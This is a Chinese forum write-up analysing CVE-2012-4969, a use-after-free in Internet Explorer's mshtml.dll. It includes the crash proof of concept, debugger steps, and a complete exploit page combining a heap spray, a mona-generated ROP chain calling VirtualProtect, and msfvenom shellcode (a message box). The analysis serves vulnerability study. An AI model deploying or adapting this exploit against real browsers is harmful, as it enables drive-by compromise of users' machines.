UAF之CVE-2012-4969漏洞分析
一、漏洞信息
1. 漏洞简述
2. 漏洞影响
3. 解决方案
二、漏洞复现
1. 环境搭建
* 靶机配置
2. 复现过程
<html>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "E";
</script>
<iframe src="./UGuQTe.html"></iframe>
</body>
</html>
<HTML>
<script>
function funcB() {
document.execCommand("selectAll");
};
function funcA() {
document.write("O");
parent.arrr[0].src = "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
}
</script>
<body onload='funcB();' onselect='funcA()'>
<div contenteditable='true'>
a
</div>
</body>
</HTML>
三、漏洞分析
1. 基本信息
漏洞文件:mshtml.dll
漏洞函数:mshtml!CMshtmlEd::Exec
漏洞对象:CMshtmlEd
2. 详细分析
(1) 漏洞函数分析
bp mshtml!CMshtmlEd::Exec
x mshtml!CmshtmlEd::*
CMshtmlEd::Release
CMshtmlEd::~CMshtmlE
不过析构函数一般是与free一起调用的,查看CMshtmlEd::~CMshtmlEd,发现由CMshtmlEd::Release调用,查看release,有一处跳转执行free,所以就在CMshtmlEd::Release下断点。
0:005> bp mshtml!CMshtmlEd::Exec //漏洞函数
0:005> g
0:005> bp mshtml!CMshtmlEd::Release
bp mshtml!CMshtmlEd::CMshtmlEd
bp mshtml!CMshtmlEd::Release
四、漏洞利用
1. 利用环境
2. 利用过程
<html>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "E";
function alloc(len, str) {
while (str.length < len)
str += str;
return str.substr(0, (len - 6) / 2);
}
var block_size = 0x1000 / 2; //一页大小
var offset = (0x0c0c - 0x0020 - 4) / 2; // shellcode在块中的偏移
var filler = unescape("%u0c0c");
while (filler.length < offset) {
filler += filler;
}
filler = filler.substring(0, offset);
var shellcode = unescape("%u7546%u7a7a%u5379" + "%u6365%u7275%u7469" + "%u9079");// FuzzySecurity的ascii,仅仅作为标识
var nop = unescape("%u9090");
for (i = 0; i < block_size; i++) {
nop += unescape("%u9090");
}
nop = nop.substring(0, block_size - shellcode.length - filler.length);
var block = filler + shellcode + nop;
block = alloc(0x100000-0x10, block);
len_block = block.length;
heap_chunks = new Array();
for (i = 0; i < 150; i++) {
heap_chunks[i] = block.substr(0, block.length);
}
</script>
<iframe src="../hpIpD0pjgv/UGuQTe.html"></iframe>
</body>
</html>
s -a 0x00000000 L?7fffffff "FuzzySecurity"
!py mona rop -m "MSVCR71.dll, jp2ssv.dll"
//rop chain generated with mona.py - www.corelan.be
var rop_gadgets = unescape(
"%u5b4f%u7c36" + // 0x7c365b4f : ,# POP EBX # POP EBP # RET [MSVCR71.dll]
"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
"%u8b05%u7c34" + // 0x7c348b05: ,# XCHG EAX,ESP # RETN
"" + // #[---INFO:gadgets_to_set_ebp:---] :
"%u6d28%u7c35" + // 0x7c356d28 : ,# POP EBP # RETN [MSVCR71.dll]
"%u6d28%u7c35" + // 0x7c356d28 : ,# skip 4 bytes [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_ebx:---] :
// "%u09cf%u7c36" + // 0x7c3609cf : ,# POP EBX # RETN [MSVCR71.dll]
// "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
"" + // #[---INFO:gadgets_to_set_edx:---] :
"%u4f8e%u7c34" + // 0x7c344f8e : ,# POP EDX # RETN [MSVCR71.dll]
"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
"" + // #[---INFO:gadgets_to_set_ecx:---] :
"%u8ab2%u7c35" + // 0x7c358ab2 : ,# POP ECX # RETN [MSVCR71.dll]
"%uf2a1%u7c38" + // 0x7c38f2a1 : ,# &Writable location [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_edi:---] :
"%ue239%u7c36" + // 0x7c36e239 : ,# POP EDI # RETN [MSVCR71.dll]
"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_esi:---] :
"%uf8f8%u7c34" + // 0x7c34f8f8 : ,# POP ESI # RETN [MSVCR71.dll]
"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]
"%u6747%u7c37" + // 0x7c376747 : ,# POP EAX # RETN [MSVCR71.dll]
"%ua151%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]
"" + // #[---INFO:pushad:---] :
"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
"" + // #[---INFO:extras:---] :
"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]
"");
kali@kali:~$ msfvenom -p windows/messagebox -f js_le
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 272 bytes
Final size of js_le file: 816 bytes
%uebd9%ud99b%u2474%u31f4%ub2d2%u3177%u64c9%u718b%u8b30%u0c76%u768b%u8b1c%u0846%u7e8b%u8b20%u3836%u184f%uf375%u0159%uffd1%u60e1%u6c8b%u2424%u458b%u8b3c%u2854%u0178%u8bea%u184a%u5a8b%u0120%ue3eb%u4934%u348b%u018b%u31ee%u31ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uc701%uf4eb%u7c3b%u2824%ue175%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%ub2c3%u2908%u89d4%u89e5%u68c2%u4e8e%uec0e%ue852%uff9f%uffff%u4589%ubb04%ud87e%u73e2%u1c87%u5224%u8ee8%uffff%u89ff%u0845%u6c68%u206c%u6841%u3233%u642e%u7568%u6573%u3072%u88db%u245c%u890a%u56e6%u55ff%u8904%u50c2%ua8bb%u4da2%u87bc%u241c%ue852%uff5f%uffff%u6f68%u5878%u6820%u6761%u4265%u4d68%u7365%u3173%u88db%u245c%u890a%u68e3%u2058%u2020%u4d68%u4653%u6821%u6f72%u206d%u6f68%u202c%u6866%u6548%u6c6c%uc931%u4c88%u1024%ue189%ud231%u5352%u5251%ud0ff%uc031%uff50%u0855
<html>
<body>
<script>
var arrr = new Array();
arrr[0] = window.document.createElement("img");
arrr[0]["src"] = "E";
function alloc(len, str) {
while (str.length < len)
str += str;
return str.substr(0, (len - 6) / 2);
}
var block_size = 0x1000 / 2; //一页大小
var offset = (0x0c0c - 0x0020 - 4) / 2;
var filler = unescape("%u0c0c");
while (filler.length < offset) {
filler += filler;
}
filler = filler.substring(0, offset);
// msfvenom -p windows/messagebox -f js_le
var shellcode = unescape("%uebd9%ud99b%u2474%u31f4%ub2d2%u3177%u64c9%u718b%u8b30%u0c76%u768b%u8b1c%u0846%u7e8b%u8b20%u3836%u184f%uf375%u0159%uffd1%u60e1%u6c8b%u2424%u458b%u8b3c%u2854%u0178%u8bea%u184a%u5a8b%u0120%ue3eb%u4934%u348b%u018b%u31ee%u31ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uc701%uf4eb%u7c3b%u2824%ue175%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%ub2c3%u2908%u89d4%u89e5%u68c2%u4e8e%uec0e%ue852%uff9f%uffff%u4589%ubb04%ud87e%u73e2%u1c87%u5224%u8ee8%uffff%u89ff%u0845%u6c68%u206c%u6841%u3233%u642e%u7568%u6573%u3072%u88db%u245c%u890a%u56e6%u55ff%u8904%u50c2%ua8bb%u4da2%u87bc%u241c%ue852%uff5f%uffff%u6f68%u5878%u6820%u6761%u4265%u4d68%u7365%u3173%u88db%u245c%u890a%u68e3%u2058%u2020%u4d68%u4653%u6821%u6f72%u206d%u6f68%u202c%u6866%u6548%u6c6c%uc931%u4c88%u1024%ue189%ud231%u5352%u5251%ud0ff%uc031%uff50%u0855");
//rop chain generated with mona.py - www.corelan.be
var rop_gadgets = unescape(
"%u5b4f%u7c36" + // 0x7c365b4f : ,# POP EBX # POP EBP # RET [MSVCR71.dll]
"%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
"%u8b05%u7c34" + // 0x7c348b05: ,# XCHG EAX,ESP # RETN
"" + // #[---INFO:gadgets_to_set_ebp:---] :
"%u6d28%u7c35" + // 0x7c356d28 : ,# POP EBP # RETN [MSVCR71.dll]
"%u6d28%u7c35" + // 0x7c356d28 : ,# skip 4 bytes [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_ebx:---] :
// "%u09cf%u7c36" + // 0x7c3609cf : ,# POP EBX # RETN [MSVCR71.dll]
// "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
"" + // #[---INFO:gadgets_to_set_edx:---] :
"%u4f8e%u7c34" + // 0x7c344f8e : ,# POP EDX # RETN [MSVCR71.dll]
"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
"" + // #[---INFO:gadgets_to_set_ecx:---] :
"%u8ab2%u7c35" + // 0x7c358ab2 : ,# POP ECX # RETN [MSVCR71.dll]
"%uf2a1%u7c38" + // 0x7c38f2a1 : ,# &Writable location [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_edi:---] :
"%ue239%u7c36" + // 0x7c36e239 : ,# POP EDI # RETN [MSVCR71.dll]
"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll]
"" + // #[---INFO:gadgets_to_set_esi:---] :
"%uf8f8%u7c34" + // 0x7c34f8f8 : ,# POP ESI # RETN [MSVCR71.dll]
"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll]
"%u6747%u7c37" + // 0x7c376747 : ,# POP EAX # RETN [MSVCR71.dll]
"%ua151%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll]
"" + // #[---INFO:pushad:---] :
"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
"" + // #[---INFO:extras:---] :
"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll]
"");
var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
rop_gadgets += nop;
for (i = 0; i < block_size; i++)
nop += unescape("%u9090");
nop = nop.substring(0, block_size - rop_gadgets.length - shellcode.length - filler.length);
var block = filler + rop_gadgets + shellcode + nop;
block = alloc(0xfffe0, block);//1MB堆内存
len_block = block.length;
heap_chunks = new Array();
for (i = 0; i < 150; i++)
heap_chunks[i] = block.substr(0, block.length);
</script>
<iframe src="../hpIpD0pjgv/UGuQTe.html"></iframe>
</body>
</html>
五、参考文献
看雪ID:mb_uvhwamsn
https://bbs.pediy.com/user-home-913279.htm
*本文由看雪论坛 mb_uvhwamsn 原创,转载请注明来自看雪社区。
《安卓高级研修班》2021年6月班火热招生中!
# 往期推荐
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注KnowSafe微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
- 微软确认Win11 24H2打印机兼容性问题!Arm设备需注意
- 历史上的今天:微软黑屏事件;Ubuntu Linux 操作系统发布;Apple Pay 正式上线
- 谁说 Python 搞不定 AI 模型微服务?!Towhee 来了!
- Open Talk 线上专场|算力时代 K8S 集群如何高效运行
- 苹果维修堪比登天难:评级F,获得最低分2.75分
- 数字化落后,工业就挨打!
- 创投 | Augury首席执行官Saar Yoskovitz谈人工智能赋能的声音检测技术如何守护机器健康(上)
- 白山云全新发布 Baishan Canvas:一体化边缘云平台,更极速、更安全、更敏捷
- Chrome内存占用高的问题有望被解决
- 语音通话,就是要“只听你一个人的”
- 美国远程教育网络遭攻击启示录
- 赛门铁克Symantec和Thawte,Digicert三个SSL证书CA机构有什么关系
赞助链接